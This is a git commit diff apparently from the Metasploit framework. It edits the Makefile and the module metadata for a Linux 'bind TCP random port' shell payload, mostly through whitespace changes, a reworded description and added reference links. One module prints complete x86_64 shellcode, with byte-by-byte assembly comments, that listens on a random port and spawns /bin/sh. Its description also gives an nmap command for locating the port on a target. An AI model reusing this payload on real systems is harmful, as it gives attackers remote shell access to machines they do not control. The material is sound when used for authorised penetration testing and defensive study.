Merge pull request #1 from todb-r7/pr2350-fix-random-bind-port-shellcode

Fixes for #2350, random bind shellcode
bug/bundler_fix
Geyslan Gregório Bem 2013-11-11 08:53:22 -08:00
commit 81d82a77e8
3 changed files with 26 additions and 22 deletions

View File

@ -1,11 +1,11 @@
STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
stager_egghunt stager_sock_find stager_sock_reverse \
stager_sock_reverse_icmp stager_sock_reverse_udp \
stager_egghunt stager_sock_find stager_sock_reverse \
stager_sock_reverse_icmp stager_sock_reverse_udp \
stager_sock_reverse_udp_dns
STAGES=stage_tcp_shell stage_udp_shell
SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
single_shell_bind_tcp_random_port
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
single_shell_bind_tcp_random_port
OBJS=${STAGERS} ${STAGES} ${SINGLE}
@ -38,11 +38,11 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
@ruby -p -a -e ' \
$$F.shift; \
$$F[0].tap { |s| \
s.tr! "A-F", "a-f"; \
t=s.dup; \
s.clear; \
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
STDIN.eof? ? s<< " # " : s<< "+# "; \
s.tr! "A-F", "a-f"; \
t=s.dup; \
s.clear; \
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
STDIN.eof? ? s<< " # " : s<< "+# "; \
}; \
$$_ = $$F.join(" ") + "\n"; \
' < $*.tmp > $@

View File

@ -15,11 +15,13 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
'Assembly source: http://goo.gl/TAveVc',
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
'Description' => %q{
Listen for a connection in a random port and spawn a command shell.
Use nmap to discover the open port: 'nmap -sS target -p-'.
},
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
'License' => BSD_LICENSE,
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm'],
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'Payload' =>
@ -31,21 +33,21 @@ module Metasploit3
"\x6a\x02" +# pushq $0x2
"\x5f" +# pop %rdi
"\xb0\x29" +# mov $0x29,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\x52" +# push %rdx
"\x5e" +# pop %rsi
"\x50" +# push %rax
"\x5f" +# pop %rdi
"\xb0\x32" +# mov $0x32,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\xb0\x2b" +# mov $0x2b,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\x57" +# push %rdi
"\x5e" +# pop %rsi
"\x48\x97" +# xchg %rax,%rdi
"\xff\xce" +# dec %esi
"\xb0\x21" +# mov $0x21,%al
"\x0f\x05" +# syscall
"\x0f\x05" +# syscall
"\x75\xf8" +# jne 40009f
"\x52" +# push %rdx
"\x48\xbf\x2f\x2f\x62" +# movabs $0x68732f6e69622f2f,%rdi
@ -54,7 +56,7 @@ module Metasploit3
"\x54" +# push %rsp
"\x5f" +# pop %rdi
"\xb0\x3b" +# mov $0x3b,%al
"\x0f\x05" # syscall
"\x0f\x05" # syscall
}
))
end

View File

@ -15,11 +15,13 @@ module Metasploit3
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
'Assembly source: http://goo.gl/V5OObo',
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
'Description' => %q{
Listen for a connection in a random port and spawn a command shell.
Use nmap to discover the open port: 'nmap -sS target -p-'.
},
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
'License' => BSD_LICENSE,
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm'],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Payload' =>